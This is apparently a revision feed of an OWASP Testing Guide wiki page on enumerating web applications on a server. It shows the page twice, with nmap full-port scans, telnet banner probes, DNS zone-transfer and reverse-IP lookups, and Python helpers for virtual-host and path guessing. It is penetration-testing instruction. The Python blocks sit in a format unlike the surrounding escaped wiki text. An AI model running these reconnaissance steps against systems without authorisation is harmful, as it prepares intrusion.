Sometimes you, as a security professional, are given a set of IP addresses (or possibly just one) as a target to test, and nothing else. It is arguable that this scenario is more akin to a pentest-type engagement, but in any case such an assignment is expected to test all web applications accessible through this target (and possibly other things). The problem is that the given IP address may host an http service on port 80 which, when accessed by specifying the IP address (which is all you know), reports &amp;quot;No web &lt;br /&gt;
server configured at this address&amp;quot; or a similar message. Yet that system could &amp;quot;hide&amp;quot; a number of web applications, associated with unrelated symbolic (DNS) names. Obviously, the extent of your analysis is deeply affected by whether you test all of these applications or miss some of them because you fail to notice them.&lt;br /&gt;
Sometimes the target specification is richer: maybe you are handed a list of IP addresses and their corresponding symbolic names. Nevertheless, this list might convey only partial information, i.e. it could omit some symbolic names – and the client might not even be aware of that! (This is more likely to happen in large organizations.)&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Other issues affecting the scope of the assessment are represented by web applications published at non-obvious URLs (e.g., http://www.example.com/some-strange-URL), which are not referenced elsewhere. This may happen either by error (due to misconfigurations), or intentionally (for example, unadvertised administrative interfaces).&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
To address these issues it is necessary to perform a web application discovery.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Black Box testing and example ==&lt;br /&gt;
'''Web application discovery''' &amp;lt;br&amp;gt;&lt;br /&gt;
Web application discovery is a process aimed at identifying web applications on a given infrastructure. The latter is usually specified as a set of IP addresses (maybe a net block), but may also consist of a set of DNS symbolic names, or a mix of the two.&amp;lt;br&amp;gt;&lt;br /&gt;
This information is handed out prior to the execution of an assessment, be it a classic-style penetration test or an application-focused assessment. In both cases, unless the rules of engagement specify otherwise (e.g., “test only the application located at the URL http://www.example.com/”), the assessment should be as comprehensive in scope as possible, i.e. it should, first of all, identify all the applications accessible through the given target. In the following we will examine a few techniques that can be employed to achieve this goal. &amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;u&amp;gt;Notes&amp;lt;/u&amp;gt; Some of the following techniques apply to Internet-facing web servers, namely DNS and reverse-IP web-based search services and the use of search engines. Examples make use of private IP addresses (such as ''192.168.1.100'') which, unless indicated otherwise, represent ''generic'' IP addresses and are used only for anonymity purposes.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
There are two factors influencing how many applications are related to a given DNS name (or an IP address).&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''1. Different base URL''' &amp;lt;br&amp;gt;&lt;br /&gt;
The obvious entry point for a web application is ''www.example.com'', i.e. with this shorthand notation we think of the web application originating at http://www.example.com/ (the same applies for https). However, though this is the most common situation, there is nothing forcing the application to start at “/”.&amp;lt;br&amp;gt;&lt;br /&gt;
For example, the same symbolic name may be associated to three web applications such as &amp;lt;br&amp;gt;&lt;br /&gt;
http://www.example.com/url1 &amp;lt;br&amp;gt;&lt;br /&gt;
http://www.example.com/url2 &amp;lt;br&amp;gt;&lt;br /&gt;
http://www.example.com/url3 &amp;lt;br&amp;gt;&lt;br /&gt;
In this case the URL http://www.example.com/ would not be associated with a meaningful page, and the three applications would be “hidden” unless we explicitly know how to reach them, i.e. we know ''url1'', ''url2'' or ''url3''. There is usually no reason to publish web applications in this way, unless you don’t want them to be accessible in a standard way and are prepared to inform your users about their exact location. This doesn’t mean that these applications are secret, just that their existence and location are not explicitly advertised.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''2. Non-standard ports''' &amp;lt;br&amp;gt;&lt;br /&gt;
While web applications usually live on port 80 (http) and 443 (https), there is nothing magic about these port numbers. In fact, web applications may be associated with arbitrary TCP ports, and can be referenced by specifying the port number as follows: http[s]://www.example.com:port/. For example, http://www.example.com:20000/.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
There is another factor affecting how many web applications are related to a given IP address.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''3. Virtual hosts''' &amp;lt;br&amp;gt;&lt;br /&gt;
DNS allows a single IP address to be associated with one or more symbolic names. For example, the IP address ''192.168.1.100'' might be associated with the DNS names ''www.example.com, helpdesk.example.com, webmail.example.com'' (it is not even necessary that all the names belong to the same DNS domain). This 1-to-N relationship may be used to serve different content through so-called virtual hosts. The information specifying the virtual host being referred to is embedded in the HTTP 1.1 ''Host:'' header [1].&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
We would not suspect the existence of other web applications in addition to the obvious ''www.example.com'', unless we know of ''helpdesk.example.com'' and ''webmail.example.com''.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''Approaches to address issue 1 - non-standard URLs'''&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
There is no foolproof way to ascertain the existence of non-standard-named web applications. Being non-standard, there is no fixed recipe for discovering them. However, a few criteria may aid the search.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
First, if the web server is misconfigured and allows directory browsing, it may be possible to spot these applications. Vulnerability scanners may help in this respect. &amp;lt;br&amp;gt;&lt;br /&gt;
Second, these applications might be referenced by other web pages; as such, there is a chance that they have been spidered and indexed by web search engines. If we suspect the existence of such “hidden” applications on ''www.example.com'' we could, for example, search using the ''site'' operator and examine the results of the query “site:www.example.com”. Among the returned URLs there could be one pointing to such a non-obvious application.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Another option is to probe for URLs which are likely candidates for non-published applications. For example, a web mail front end might be accessible from https://www.example.com/webmail even though this URL is not referenced anywhere (after all, employees know where the webmail application is located, and there is no reason to advertise it to outsiders by publishing it on the corporate web site). The same holds for administrative interfaces, which may be published at standard URLs (for example, a Tomcat administrative interface) and yet not be referenced anywhere. So a bit of dictionary-style searching (or “intelligent guessing”) could yield some results. Vulnerability scanners may help in this respect.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''Approaches to address issue 2 - non-standard ports'''&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
The existence of web applications on non-standard ports is easy to check. A port scanner such as nmap [2] can perform service recognition by means of the -sV option, and will identify http[s] services on arbitrary ports. What is required is a full scan of the whole 64k TCP port address space.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
For example, the following command will look up, with a TCP connect scan, all open ports on IP ''192.168.1.100'' and will try to determine what services are bound to them (only ''essential'' switches are shown – nmap features a broad set of options, whose discussion is out of scope).&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
nmap -P0 -sT -sV -p1-65535 192.168.1.100&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
It is sufficient to examine the output, looking for http or for indications of SSL-wrapped services (which should be probed to confirm they are https). For example, the output of the previous command could look like:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Interesting ports on 192.168.1.100:&lt;br /&gt;
(The 65527 ports scanned but not shown below are in state: closed)&lt;br /&gt;
PORT      STATE SERVICE     VERSION&lt;br /&gt;
22/tcp    open  ssh         OpenSSH 3.5p1 (protocol 1.99)&lt;br /&gt;
80/tcp    open  http        Apache httpd 2.0.40 ((Red Hat Linux))&lt;br /&gt;
443/tcp   open  ssl         OpenSSL&lt;br /&gt;
901/tcp   open  http        Samba SWAT administration server&lt;br /&gt;
1241/tcp  open  ssl         Nessus security scanner&lt;br /&gt;
3690/tcp  open  unknown&lt;br /&gt;
8000/tcp  open  http-alt?&lt;br /&gt;
8080/tcp  open  http        Apache Tomcat/Coyote JSP engine 1.1&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
From this example, we see that&lt;br /&gt;
* There is an Apache http server running on port 80&lt;br /&gt;
* It looks like there is an https server on port 443 (but this needs to be confirmed; for example, by visiting https://192.168.1.100 with a browser)&lt;br /&gt;
* On port 901 there is a Samba SWAT web interface&lt;br /&gt;
* The service on port 1241 is not https, but is the SSL-wrapped Nessus daemon&lt;br /&gt;
* Port 3690 features an unspecified service (nmap gives back its ''fingerprint'' - here omitted for clarity - together with instructions to submit it for incorporation in the nmap fingerprint database, provided you know which service it represents)&lt;br /&gt;
* Another unspecified service on port 8000; this might possibly be http, since it is not uncommon to find http servers on this port. Let's give it a look&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
$ telnet 192.168.1.100 8000&lt;br /&gt;
Trying 192.168.1.100...&lt;br /&gt;
Connected to 192.168.1.100.&lt;br /&gt;
Escape character is '^]'.&lt;br /&gt;
GET / HTTP/1.0&lt;br /&gt;
&lt;br /&gt;
HTTP/1.0 200 OK&lt;br /&gt;
pragma: no-cache&lt;br /&gt;
Content-Type: text/html&lt;br /&gt;
Server: MX4J-HTTPD/1.0&lt;br /&gt;
expires: now&lt;br /&gt;
Cache-Control: no-cache&lt;br /&gt;
&lt;br /&gt;
&amp;lt;html&amp;gt;&lt;br /&gt;
...&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
This confirms that it is indeed an HTTP server. Alternatively, we could have visited the URL with a web browser, or used the GET or HEAD Perl commands, which mimic HTTP interactions such as the one given above (note, however, that HEAD requests may not be honored by all servers).&lt;br /&gt;
* Apache Tomcat running on port 8080&lt;br /&gt;
&lt;br /&gt;
The same task may be performed by vulnerability scanners – but first check that your scanner of choice is able to identify http[s] services running on non-standard ports. For example, Nessus [3] is capable of identifying them on arbitrary ports (provided you instruct it to scan all the ports), and will provide – compared to nmap – a number of tests on known web server vulnerabilities, as well as on the SSL configuration of https services. As hinted before, Nessus is also able to spot popular applications / web interfaces which could otherwise go unnoticed (for example, a Tomcat administrative interface).&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''Approaches to address issue 3 - virtual hosts'''&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
There are a number of techniques which may be used to identify the DNS names associated with a given IP address ''x.y.z.t''.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;u&amp;gt;DNS zone transfers&amp;lt;/u&amp;gt; &amp;lt;br&amp;gt;&lt;br /&gt;
This technique is of limited use nowadays, given that zone transfers are largely not honored by DNS servers, but it is worth a try. &amp;lt;br&amp;gt;&lt;br /&gt;
First of all, we must determine the name servers serving ''x.y.z.t''. If a symbolic name is known for ''x.y.z.t'' (let it be ''www.example.com''), its name servers can be determined by means of tools such as ''nslookup'' or ''dig'' by requesting DNS NS records.&amp;lt;br&amp;gt;&lt;br /&gt;
If no symbolic names are known for ''x.y.z.t'', but your target definition contains at least a symbolic name, you may try to apply the same process and query the name server of that name (hoping that ''x.y.z.t'' will be served as well by that name server). For example, if your target consists of the IP address ''x.y.z.t'' and of ''mail.example.com'', determine the name servers for domain ''example.com''.&amp;lt;br&amp;gt;&lt;br /&gt;
Then a zone transfer may be requested from the name servers for domain ''example.com''; if you are lucky, you will get back a list of the DNS entries for this domain. This will include the obvious ''www.example.com'' and the not-so-obvious ''helpdesk.example.com'' and ''webmail.example.com'' (and possibly others). Check all names returned by the zone transfer and consider all of those which are related to the target being evaluated.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;u&amp;gt;DNS inverse queries&amp;lt;/u&amp;gt; &amp;lt;br&amp;gt;&lt;br /&gt;
This process is similar to the previous one, but relies on inverse (PTR) DNS records. Rather than requesting a zone transfer, try setting the record type to PTR and issue a query on the given IP address. If you are lucky, you may get back a DNS name entry. This technique relies on the existence of IP-to-symbolic-name maps, which is not guaranteed.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;u&amp;gt;Web-based DNS searches&amp;lt;/u&amp;gt; &amp;lt;br&amp;gt;&lt;br /&gt;
This kind of search is akin to a DNS zone transfer, but relies on web-based services that allow name-based searches on DNS. One such service is the ''Netcraft Search DNS'' service, available at http://searchdns.netcraft.com/?host. You may query for a list of names belonging to your domain of choice, such as ''example.com'', and then check whether the names you obtained pertain to the target you are examining.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;u&amp;gt;Reverse-IP services&amp;lt;/u&amp;gt; &amp;lt;br&amp;gt;&lt;br /&gt;
Reverse-IP services are similar to DNS inverse queries, with the difference that you query a web-based application instead of a name server. There are a number of such services available. Since they tend to return partial (and often different) results, it is better to use multiple services to obtain a more comprehensive analysis.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
''Domain tools reverse IP'': http://www.domaintools.com/reverse-ip/ &amp;lt;br&amp;gt;&lt;br /&gt;
(requires free membership) &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''MSN search'': http://search.msn.com &amp;lt;br&amp;gt;&lt;br /&gt;
syntax: &amp;quot;ip:x.x.x.x&amp;quot; (without the quotes) &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''Webhosting info'': http://whois.webhosting.info/ &amp;lt;br&amp;gt; &lt;br /&gt;
syntax: http://whois.webhosting.info/x.x.x.x &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''DNSstuff'': http://www.dnsstuff.com/ &amp;lt;br&amp;gt;&lt;br /&gt;
(multiple services available) &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
http://net-square.com/msnpawn/index.shtml &amp;lt;br&amp;gt;&lt;br /&gt;
(multiple queries on  domains and IP addresses, requires installation) &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''tomDNS'': http://www.tomdns.net/ &amp;lt;br&amp;gt;&lt;br /&gt;
(some services are still private at the time of writing) &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''SEOlogs.com'': http://www.seologs.com/ip-domains.html &amp;lt;br&amp;gt;&lt;br /&gt;
(reverse ip/domain lookup) &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;Googling&amp;lt;/u&amp;gt; &amp;lt;br&amp;gt;&lt;br /&gt;
After you have gathered as much information as you can with the previous techniques, you can rely on search engines to refine and extend your analysis. This may yield evidence of additional symbolic names belonging to your target, or of applications accessible via non-obvious URLs.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Gray Box testing and example == &lt;br /&gt;
Not applicable. The methodology remains the same as listed in [[Black Box testing and example]], no matter how much information you start with.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
[1] RFC 2616 – Hypertext Transfer Protocol – HTTP 1.1 &amp;lt;br&amp;gt;&lt;br /&gt;
[2] nmap, http://www.insecure.org &amp;lt;br&amp;gt;&lt;br /&gt;
[3] Nessus Vulnerability Scanner, http://www.nessus.org &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Whitepapers'''&amp;lt;br&amp;gt;&lt;br /&gt;
...&amp;lt;br&amp;gt;&lt;br /&gt;
'''Tools'''&amp;lt;br&amp;gt;&lt;br /&gt;
DNS lookup tools such as ''nslookup'', ''dig'' or similar. &amp;lt;br&amp;gt;&lt;br /&gt;
Port scanners (such as nmap, http://www.insecure.org) and vulnerability scanners (such as Nessus: http://www.nessus.org; wikto: http://www.sensepost.com/research/wikto/). &amp;lt;br&amp;gt;&lt;br /&gt;
Search engines (Google, and other major engines). &amp;lt;br&amp;gt;&lt;br /&gt;
Specialized DNS-related web-based search service: see text.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{{Category:OWASP Testing Project AoC}}&lt;/div&gt;</summary>
		<author><name>Bregolin</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Enumerate_Applications_on_Webserver_(OTG-INFO-004)&amp;diff=12115</id>
		<title>Enumerate Applications on Webserver (OTG-INFO-004)</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Enumerate_Applications_on_Webserver_(OTG-INFO-004)&amp;diff=12115"/>
				<updated>2006-11-09T16:13:36Z</updated>
		
		<summary type="html">&lt;p&gt;Bregolin: /* Black Box testing and example */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]]&amp;lt;br&amp;gt;&lt;br /&gt;
{{Template:OWASP Testing Guide v2}}&lt;br /&gt;
&lt;br /&gt;
== Brief Summary ==&lt;br /&gt;
A common step in testing for vulnerabilities in a web presence is to find out which particular applications are hosted on a web server.&amp;lt;br/&amp;gt;&lt;br /&gt;
Many different applications, in fact, have known vulnerabilities and known attack strategies that can be exploited in order to gain remote control or compromise data.&amp;lt;br&amp;gt;&lt;br /&gt;
In addition, many applications are often hosted on a particular web server without any reference from the main website: this is true for internal and/or extranet websites, which could be misconfigured or not updated due to the perception that they're used only &amp;quot;internally&amp;quot;.&amp;lt;br/&amp;gt;&lt;br /&gt;
Furthermore, many applications use common paths for administrative interfaces, which can be used to guess or brute-force administrative passwords.&lt;br /&gt;
&lt;br /&gt;
== Description of the Issue == &lt;br /&gt;
With the proliferation of virtual web servers, the traditional 1:1-type relationship between an IP address and a web server is losing much of its original significance. It is not uncommon to have multiple web sites / applications whose symbolic names resolve &lt;br /&gt;
to the same IP address (and this scenario is not limited to hosting environments, but applies to ordinary corporate environments as well).&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Sometimes you, as a security professional, are given a set of IP addresses (or possibly just one) as a target to test, and no other knowledge. It is arguable that this scenario is more akin to a pentest-type engagement, but in any case it is expected that such an assignment would test all web applications accessible through this target (and possibly other things). The problem is, the given IP address hosts an http service on port 80, but if you access it specifying the IP address (which is all you know) it reports &amp;quot;No web server configured at this address&amp;quot; or a similar message. But that system could &amp;quot;hide&amp;quot; a number of web applications, associated with unrelated symbolic (DNS) names. Obviously, the extent of your analysis is deeply affected by whether you test all of these applications, or miss some of them because you do not notice them.&lt;br /&gt;
Sometimes the target specification is richer – maybe you are handed a list of IP addresses and their corresponding symbolic names. Nevertheless, this list might convey partial information, i.e. it could omit some symbolic names – and the client might not even be aware of that! (This is more likely to happen in large organizations.)&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Other issues affecting the scope of the assessment are represented by web applications published at non-obvious URLs (e.g., http://www.example.com/some-strange-URL), which are not referenced elsewhere. This may happen either by error (due to misconfigurations), or intentionally (for example, unadvertised administrative interfaces).&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
To address these issues it is necessary to perform a web application discovery.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Black Box testing and example ==&lt;br /&gt;
'''Web application discovery''' &amp;lt;br&amp;gt;&lt;br /&gt;
Web application discovery is a process aimed at identifying the web applications on a given infrastructure. The latter is usually specified as a set of IP addresses (maybe a net block), but may also consist of a set of DNS symbolic names, or a mix of the two.&amp;lt;br&amp;gt;&lt;br /&gt;
This information is handed out prior to the execution of an assessment, be it a classic-style penetration test or an application-focused assessment. In both cases, unless the rules of engagement specify otherwise (e.g., “test only the application located at the URL http://www.example.com/”), the assessment should strive to be as comprehensive in scope as possible, i.e. it should, first of all, identify all the applications accessible through the given target. In the following, we will examine a few techniques that can be employed to achieve this goal. &amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;u&amp;gt;Note&amp;lt;/u&amp;gt;: some of the following techniques (namely, the web-based DNS and reverse-IP search services and the use of search engines) apply only to Internet-facing web servers. The examples make use of private IP addresses (such as ''192.168.1.100'') which, unless indicated otherwise, represent ''generic'' IP addresses and are used only for anonymity purposes.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
There are two factors influencing how many applications are related to a given DNS name (or an IP address).&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''1. Different base URL''' &amp;lt;br&amp;gt;&lt;br /&gt;
The obvious entry point for a web application is ''www.example.com'', i.e. with this shorthand notation we think of the web application originating at http://www.example.com/ (the same applies to https). However, though this is the most common situation, there is nothing forcing the application to start at “/”.&amp;lt;br&amp;gt;&lt;br /&gt;
For example, the same symbolic name may be associated with three web applications such as &amp;lt;br&amp;gt;&lt;br /&gt;
http://www.example.com/url1 &amp;lt;br&amp;gt;&lt;br /&gt;
http://www.example.com/url2 &amp;lt;br&amp;gt;&lt;br /&gt;
http://www.example.com/url3 &amp;lt;br&amp;gt;&lt;br /&gt;
In this case, the URL http://www.example.com/ would not be associated with a meaningful page, and the three applications would be “hidden” unless we explicitly know how to reach them, i.e. we know ''url1'', ''url2'' or ''url3''. There is usually no need to publish web applications in this way, unless you don’t want them to be accessible in a standard way and you are prepared to inform your users about their exact location. This doesn’t mean that these applications are secret, just that their existence and location are not explicitly advertised.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''2. Non-standard ports''' &amp;lt;br&amp;gt;&lt;br /&gt;
While web applications usually live on port 80 (http) and 443 (https), there is nothing magic about these port numbers. In fact, web applications may be associated with arbitrary TCP ports, and can be referenced by specifying the port number as follows: http[s]://www.example.com:port/. For example, http://www.example.com:20000/.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
There is another factor affecting how many web applications are related to a given IP address.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''3. Virtual hosts''' &amp;lt;br&amp;gt;&lt;br /&gt;
DNS allows a single IP address to be associated with one or more symbolic names. For example, the IP address ''192.168.1.100'' might be associated with the DNS names ''www.example.com, helpdesk.example.com, webmail.example.com'' (it is not actually necessary that all the names belong to the same DNS domain). This 1-to-N relationship may be used to serve different content through so-called virtual hosts. The information specifying the virtual host we are referring to is embedded in the HTTP 1.1 ''Host:'' header [1].&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
We would not suspect the existence of other web applications in addition to the obvious ''www.example.com'', unless we know of ''helpdesk.example.com'' and ''webmail.example.com''.&lt;br /&gt;
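Once candidate names have been gathered, they can be checked against the shared IP by sending requests that differ only in the ''Host:'' header and comparing the responses. A minimal sketch (the host names are just the examples from above, not real targets):

```python
def vhost_request(hostname, path='/'):
    """Build a raw HTTP/1.1 request asking for the content of virtual
    host 'hostname'.  Sent over separate TCP connections to the same
    IP with different Host: values, the responses reveal which names
    the server actually serves as distinct sites."""
    return (
        'GET {} HTTP/1.1\r\n'
        'Host: {}\r\n'
        'Connection: close\r\n'
        '\r\n'
    ).format(path, hostname).encode('ascii')

# Probe each candidate name against the single IP 192.168.1.100:
for name in ('www.example.com', 'helpdesk.example.com', 'webmail.example.com'):
    req = vhost_request(name)
    # open a TCP socket to ('192.168.1.100', 80), send req,
    # and compare the replies across the different Host: values
```

Different responses for different names indicate distinct virtual hosts behind the same address.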
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''Approaches to address issue 1 - non-standard URLs'''&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
There is no foolproof way to ascertain the existence of non-standard-named web applications; being non-standard, there is no fixed recipe for finding them. However, a few techniques can aid the search.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
First, if the web server is misconfigured and allows directory browsing, it may be possible to spot these applications. Vulnerability scanners may help in this respect. &amp;lt;br&amp;gt;&lt;br /&gt;
Second, these applications might be referenced by other web pages; as such, there is a chance that they have been spidered and indexed by web search engines. If we suspect the existence of such “hidden” applications on ''www.example.com'', we could do a bit of googling using the ''site'' operator and examine the results of a query for “site:www.example.com”. Among the returned URLs, there could be one pointing to such a non-obvious application.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Another option is to probe for URLs which are likely candidates for non-published applications. For example, a web mail front end might be accessible from a URL such as https://www.example.com/webmail even though this URL is not referenced anywhere (after all, employees know where the webmail application is located, and there is no reason to disclose this information to outsiders by publishing it on the corporate web site). The same holds for administrative interfaces, which may be published at standard URLs (for example, a Tomcat administrative interface) and yet not referenced anywhere. So, a bit of dictionary-style searching (or “intelligent guessing”) could yield some results. Vulnerability scanners may help in this respect.&lt;br /&gt;
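The dictionary-style guessing can be sketched as expanding each host name into a list of candidate URLs built from a small wordlist. The paths below are purely illustrative guesses, not a definitive list, and each generated URL still has to be requested to see whether anything answers there:

```python
# Candidate paths for unadvertised applications; purely illustrative.
COMMON_PATHS = ['webmail', 'admin', 'manager/html', 'phpmyadmin', 'intranet']

def candidate_urls(host, paths=COMMON_PATHS):
    """Expand a host name into likely URLs for non-published
    applications, over both http and https.  Probing each URL (and
    noting which return something other than 404) narrows the list
    down to real applications."""
    return ['{}://{}/{}'.format(scheme, host, path)
            for scheme in ('http', 'https')
            for path in paths]
```

A larger, curated wordlist (as shipped with vulnerability scanners) would serve the same purpose; this only illustrates the mechanism.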
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
'''Approaches to address issue 2 - non-standard ports'''&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
The existence of web applications on non-standard ports is easy to check. A port scanner such as nmap [2] is capable of performing service recognition by means of the -sV option, and will identify http[s] services on arbitrary ports. What is required is a full scan of the whole 64k TCP port address space.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
For example, the following command performs a TCP connect scan of all open ports on IP ''192.168.1.100'' and tries to determine which services are bound to them (only the ''essential'' switches are shown – nmap features a broad set of options, whose discussion is out of scope).&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
nmap -P0 -sT -sV -p1-65535 192.168.1.100&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
It is sufficient to examine the output and look for http or for indications of SSL-wrapped services (which should be probed to confirm that they are https). For example, the output of the previous command could look like:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Interesting ports on 192.168.1.100:&lt;br /&gt;
(The 65527 ports scanned but not shown below are in state: closed)&lt;br /&gt;
PORT      STATE SERVICE     VERSION&lt;br /&gt;
22/tcp    open  ssh         OpenSSH 3.5p1 (protocol 1.99)&lt;br /&gt;
80/tcp    open  http        Apache httpd 2.0.40 ((Red Hat Linux))&lt;br /&gt;
443/tcp   open  ssl         OpenSSL&lt;br /&gt;
901/tcp   open  http        Samba SWAT administration server&lt;br /&gt;
1241/tcp  open  ssl         Nessus security scanner&lt;br /&gt;
3690/tcp  open  unknown&lt;br /&gt;
8000/tcp  open  http-alt?&lt;br /&gt;
8080/tcp  open  http        Apache Tomcat/Coyote JSP engine 1.1&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
From this example, we see that&lt;br /&gt;
* There is an Apache http server running on port 80&lt;br /&gt;
* It looks like there is an https server on port 443 (but this needs to be confirmed; for example, by visiting https://192.168.1.100 with a browser)&lt;br /&gt;
* On port 901 there is a Samba SWAT web interface&lt;br /&gt;
* The service on port 1241 is not https, but is the SSL-wrapped Nessus daemon&lt;br /&gt;
* Port 3690 features an unspecified service (nmap gives back its ''fingerprint'' - here omitted for clarity - together with instructions to submit it for incorporation in the nmap fingerprint database, provided you know which service it represents)&lt;br /&gt;
* Another unspecified service on port 8000; this might possibly be http, since it is not uncommon to find http servers on this port. Let's give it a look&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
$ telnet 192.168.1.100 8000&lt;br /&gt;
Trying 192.168.1.100...&lt;br /&gt;
Connected to 192.168.1.100.&lt;br /&gt;
Escape character is '^]'.&lt;br /&gt;
GET / HTTP/1.0&lt;br /&gt;
&lt;br /&gt;
HTTP/1.0 200 OK&lt;br /&gt;
pragma: no-cache&lt;br /&gt;
Content-Type: text/html&lt;br /&gt;
Server: MX4J-HTTPD/1.0&lt;br /&gt;
expires: now&lt;br /&gt;
Cache-Control: no-cache&lt;br /&gt;
&lt;br /&gt;
&amp;lt;html&amp;gt;&lt;br /&gt;
...&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
This confirms that it is indeed an HTTP server. Alternatively, we could have visited the URL with a web browser, or used the GET or HEAD Perl commands, which mimic HTTP interactions such as the one given above (note, however, that HEAD requests may not be honored by all servers).&lt;br /&gt;
* Apache Tomcat running on port 8080&lt;br /&gt;
&lt;br /&gt;
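The manual probe shown above can be automated: given the raw text a suspected port sends back, a small check of the status line and the Server header is enough to confirm an HTTP service. A minimal sketch (a hypothetical helper, not a tool from the guide):

```python
def identify_http(raw_response):
    """Given the raw text returned by a suspected HTTP port, return
    (status_line, server_banner) if the reply looks like HTTP, else
    None.  The Server header, when present, hints at the product
    behind the port (e.g. MX4J-HTTPD in the example above)."""
    lines = raw_response.splitlines()
    if not lines or not lines[0].startswith('HTTP/'):
        return None  # the service did not answer with an HTTP status line
    server = None
    for line in lines[1:]:
        if not line:
            break  # blank line: end of headers
        name, _, value = line.partition(':')
        if name.strip().lower() == 'server':
            server = value.strip()
    return lines[0], server
```

Fed the response captured in the telnet session above, this would report the 200 status line and the MX4J-HTTPD/1.0 banner.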
